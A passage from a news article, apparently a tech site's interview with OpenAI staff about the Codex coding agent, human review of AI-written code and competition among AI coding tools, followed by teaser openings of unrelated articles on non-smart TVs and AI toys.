Given this teammate approach, will there be anything left for humans to do? When asked, Embiricos drew a distinction between “vibe coding,” where developers accept AI-generated code without close review, and what AI researcher Simon Willison calls “vibe engineering,” where humans stay in the loop. “We see a lot more vibe engineering in our code base,” he said. “You ask Codex to work on that, maybe you even ask for a plan first. Go back and forth, iterate on the plan, and then you’re in the loop with the model and carefully reviewing its code.”
He added that vibe coding still has its place for prototypes and throwaway tools. “I think vibe coding is great,” he said. “Now you have discretion as a human about how much attention you wanna pay to the code.”
Over the past year, “monolithic” large language models (LLMs) like GPT-4.5 have apparently become something of a dead end in terms of frontier benchmarking progress as AI companies pivot to simulated reasoning models and also agentic systems built from multiple AI models running in parallel. We asked Embiricos whether agents like Codex represent the best path forward for squeezing utility out of existing LLM technology.
He dismissed concerns that AI capabilities have plateaued. “I think we’re very far from plateauing,” he said. “If you look at the velocity on the research team here, we’ve been shipping models almost every week or every other week.” He pointed to recent improvements where GPT-5-Codex reportedly completes tasks 30 percent faster than its predecessor at the same intelligence level. During testing, the company has seen the model work independently for 24 hours on complex tasks.
OpenAI faces competition from multiple directions in the AI coding market. Anthropic’s Claude Code and Google’s Gemini CLI offer similar terminal-based agentic coding experiences. This week, Mistral AI released Devstral 2 alongside a CLI tool called Mistral Vibe. Meanwhile, startups like Cursor have built dedicated IDEs around AI coding, reportedly reaching $300 million in annualized revenue.
Given the well-known issues with confabulation in AI models when people attempt to use them as factual resources, could it be that coding has become the killer app for LLMs? We wondered if OpenAI has noticed that coding seems to be a clear business use case for today’s AI models with less hazard than, say, using AI language models for writing or as emotional companions.
“We have absolutely noticed that coding is both a place where agents are gonna get good really fast and there’s a lot of economic value,” Embiricos said. “We feel like it’s very mission-aligned to focus on Codex. We get to provide a lot of value to developers. Also, developers build things for other people, so we’re kind of intrinsically scaling through them.”
But will tools like Codex threaten software developer jobs? Bayes acknowledged concerns but said Codex has not reduced headcount at OpenAI, and “there’s always a human in the loop because the human can actually read the code.” Similarly, the two men don’t project a future where Codex runs by itself without some form of human oversight. They feel the tool is an amplifier of human potential rather than a replacement for it.
The practical implications of agents like Codex extend beyond OpenAI’s walls. Embiricos said the company’s long-term vision involves making coding agents useful to people who have no programming experience. “All humanity is not gonna open an IDE or even know what a terminal is,” he said. “We’re building a coding agent right now that’s just for software engineers, but we think of the shape of what we’re building as really something that will be useful to be a more general agent.”
This article was updated on December 12, 2025 at 6:50 PM to mention the METR study.
Benj Edwards
Senior AI Reporter
Benj Edwards
Senior AI Reporter
Smart TVs can feel like a dumb choice if you’re looking for privacy, reliability, and simplicity.
Today’s TVs and streaming sticks are usually loaded up with advertisements and user tracking, making offline TVs seem very attractive. But ever since smart TV operating systems began making money, “dumb” TVs have been hard to find.
In response, we created this non-smart TV guide that includes much more than dumb TVs. Since non-smart TVs are so rare, this guide also breaks down additional ways to watch TV and movies online and locally without dealing with smart TVs’ evolution toward software-centric features and snooping. We’ll discuss a range of options suitable for various budgets, different experience levels, and different rooms in your home.
Protecting children from the dangers of the online world was always difficult, but that challenge has intensified with the advent of AI chatbots. A new report offers a glimpse into the problems associated with the new market, including the misuse of AI companies’ large language models (LLMs).
In a blog post today, the US Public Interest Group Education Fund (PIRG) reported its findings after testing AI toys (PDF). It described AI toys as online devices with integrated microphones that let users talk to the toy, which uses a chatbot to respond.
AI toys are currently a niche market, but they could be set to grow. More consumer companies have been eager to shoehorn AI technology into their products so they can do more, cost more, and potentially give companies user tracking and advertising data. A partnership between OpenAI and Mattel announced this year could also create a wave of AI-based toys from the maker of Barbie and Hot Wheels, as well as its competitors.